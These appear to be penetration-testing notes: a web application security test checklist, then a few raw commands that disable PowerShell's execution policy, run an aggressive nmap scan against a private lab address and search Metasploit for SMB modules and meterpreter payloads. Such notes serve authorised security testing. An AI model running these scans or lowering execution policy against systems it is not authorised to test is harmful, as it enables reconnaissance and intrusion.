Test that files and other media are integrated with the authentication and authorisation schemas
Test for known vulnerabilities and configuration issues on Web Server and Web Application
Test for default or guessable password
Test for non-production data in live environment, and vice-versa
Test for Injection vulnerabilities
Test for Buffer Overflows
Test for Insecure Cryptographic Storage
Test for Insufficient Transport Layer Protection
Test for Improper Error Handling
Test for all vulnerabilities with a CVSS v2 score > 4.0
Test for Authentication and Authorization issues
Test for CSRF
Test Web Messaging
Test for Web Storage SQL injection
Check CORS implementation
Check Offline Web Application
set-executionpolicy unrestricted
db_nmap 10.11.1.8 -A -Pn
msf5 > search smb type:auxiliary
search meterpreter type:payload
